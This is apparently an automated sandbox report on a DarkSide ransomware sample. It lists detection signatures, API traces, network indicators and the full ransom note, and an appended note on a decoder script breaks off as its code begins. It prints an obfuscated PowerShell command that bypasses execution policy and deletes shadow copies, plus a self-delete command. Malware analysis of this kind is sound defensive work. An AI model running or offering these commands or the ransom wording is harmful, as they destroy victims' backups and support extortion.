Analysis Report rUUR0qQI22

Overview

General Information

Sample Name: rUUR0qQI22 (renamed file extension from none to exe)
Analysis ID: 401962
MD5: 9d418ecc0f3bf45029263b0944236884
SHA1: eeb28144f39b275ee1ec008859e80f215710dc57
SHA256: 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Tags: DarkSideRansomware

Detection

DarkSide
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DarkSide Ransomware
Bypasses PowerShell execution policy
Contains functionality to change the wallpaper
Deletes itself after installation
Found Tor onion address
Machine Learning detection for sample
Obfuscated command line found
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: rUUR0qQI22.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: rUUR0qQI22.exe ReversingLabs: Detection: 93%
Machine Learning detection for sample
Source: rUUR0qQI22.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: rUUR0qQI22.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\\README.418990b0.TXT
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Recovery\README.418990b0.TXT
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Users\README.418990b0.TXT
Source: rUUR0qQI22.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap, 0_2_00CE5490
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap, 0_2_00CE67AD
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose, 0_2_00CE525B
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose, 0_2_00CE5368
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy, 0_2_00CE51E6
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\NULL
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\NULL
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome

Networking:

Found Tor onion address
Source: README.418990b0.TXT.0.dr String found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.105.109.19 185.105.109.19
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.3:49717 -> 185.105.109.19:443
Source: unknown DNS traffic detected: queries for: securebestapp20.com
Source: powershell.exe, 00000006.00000002.287565271.00000165FE112000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: README.418990b0.TXT.0.dr String found in binary or memory: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.279994844.0000016580001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.282581454.000001658117D000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: rUUR0qQI22.exe, 00000000.00000002.431464752.0000000003855000.00000004.00000001.sdmp, rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp String found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBl
Source: rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp String found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBlO
Source: README.418990b0.TXT.0.dr String found in binary or memory: https://torproject.org/
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

Spam, unwanted Advertisements and Ransom Demands:

Found ransom note / readme
Source: C:\README.418990b0.TXT Dropped file: ----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 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 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
Yara detected DarkSide Ransomware
Source: Yara match File source: 00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: C:\README.418990b0.TXT, type: DROPPED
Contains functionality to change the wallpaper
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4255 CreateFontW,RtlFreeHeap,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,SelectObject,SHGetSpecialFolderPathW,PathAddBackslashW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,RegOpenKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RegCloseKey,CloseHandle,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC, 0_2_00CE4255

System Summary:

Malicious sample detected (through community Yara rule)
Source: rUUR0qQI22.exe, type: SAMPLE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Contains functionality to call native functions
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4DDA RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,wcslen,RtlFreeHeap, 0_2_00CE4DDA
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE7E5D NtSetInformationThread,IsUserAnAdmin,GetCommandLineW,CommandLineToArgvW,_wcsicmp,wcsrchr,_wcsicmp,wcsrchr,_wcsicmp,OpenMutexW,CreateMutexW,CloseHandle,CloseHandle,CloseHandle, 0_2_00CE7E5D
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4C32 NtSetInformationProcess,NtSetInformationProcess, 0_2_00CE4C32
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap, 0_2_00CE57E5
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE56F9 CreateFileW,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,GetCurrentProcessId,RtlFreeHeap,CloseHandle, 0_2_00CE56F9
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5787 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle, 0_2_00CE5787
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE285C NtQueryInformationProcess, 0_2_00CE285C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE585D NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap, 0_2_00CE585D
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5650 NtQueryInformationFile, 0_2_00CE5650
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5765 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle, 0_2_00CE5765
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE587F NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap, 0_2_00CE587F
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules, 0_2_00CE380C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4E18 NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap, 0_2_00CE4E18
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4E3A NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap, 0_2_00CE4E3A
Contains functionality to delete services
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4C7B OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap, 0_2_00CE4C7B
Detected potential crypto function
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE209C 0_2_00CE209C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4819 0_2_00CE4819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAEE888169 6_2_00007FFAEE888169
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAEE888F19 6_2_00007FFAEE888F19
Sample file is different than original file name gathered from version info
Source: rUUR0qQI22.exe, 00000000.00000002.429547362.0000000000B40000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429940296.0000000000DA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs rUUR0qQI22.exe
Uses 32bit PE files
Source: rUUR0qQI22.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: rUUR0qQI22.exe, type: SAMPLE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.rans.spyw.evad.winEXE@6/10@1/2
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4B67 OpenProcessToken,GetTokenInformation,RtlAllocateHeap,GetTokenInformation,AdjustTokenPrivileges,RtlFreeHeap,CloseHandle, 0_2_00CE4B67
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE2C69 GetLogicalDriveStringsW,GetDriveTypeW,GetDiskFreeSpaceExW,_alldiv,_alldiv,_swprintf,wcsrchr,wcslen, 0_2_00CE2C69
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Users\user\AppData\Local\418990b0.ico
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\0ab00e5f701610d7524fc82247c75e80
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ayydvj.e53.ps1
Source: rUUR0qQI22.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: rUUR0qQI22.exe ReversingLabs: Detection: 93%
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File read: C:\Users\user\Desktop\rUUR0qQI22.exe
Source: unknown Process created: C:\Users\user\Desktop\rUUR0qQI22.exe 'C:\Users\user\Desktop\rUUR0qQI22.exe'
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: rUUR0qQI22.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: rUUR0qQI22.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Obfuscated command line found
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
PE file contains an invalid checksum
Source: rUUR0qQI22.exe Static PE information: real checksum: 0xfa78 should be: 0x16ef0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAEE881FA7 push esp; retf 6_2_00007FFAEE881FA8
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\\README.418990b0.TXT
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Recovery\README.418990b0.TXT
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Users\README.418990b0.TXT

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap, 0_2_00CE57E5
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap, 0_2_00CE4C7B
Contains functionality to query network adapter information
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: GetAdaptersInfo,RtlAllocateHeap,GetAdaptersInfo,inet_addr,RtlFreeHeap, 0_2_00CE6F46
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6102 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3111 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208 Thread sleep count: 6102 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852 Thread sleep count: 3111 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap, 0_2_00CE5490
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap, 0_2_00CE67AD
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose, 0_2_00CE525B
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose, 0_2_00CE5368
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy, 0_2_00CE51E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome Jump to behavior
Source: powershell.exe, 00000006.00000003.279613000.00000165FE227000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules, 0_2_00CE380C
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap, 0_2_00CE57E5
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE7E49 mov eax, dword ptr fs:[00000030h] 0_2_00CE7E49
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE7E53 mov eax, dword ptr fs:[00000030h] 0_2_00CE7E53
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE1F0F mov eax, dword ptr fs:[00000030h] 0_2_00CE1F0F
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s' Jump to behavior
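The command line above builds its payload one byte at a time from a hex blob and hands the result to iex, so the real command never appears on the command line. The decoder below is an added example written for this page (it is not part of the Joe Sandbox report or of the sample); it recovers the string the loop constructs and flags the dangerous commands a responder would act on. Only the shadow copy pattern is taken from this report; the vssadmin, wbadmin and bcdedit patterns are assumed additions covering the same recovery-inhibition goal, and the hex payload is copied verbatim from the report's command line.

```python
import re
from typing import Optional

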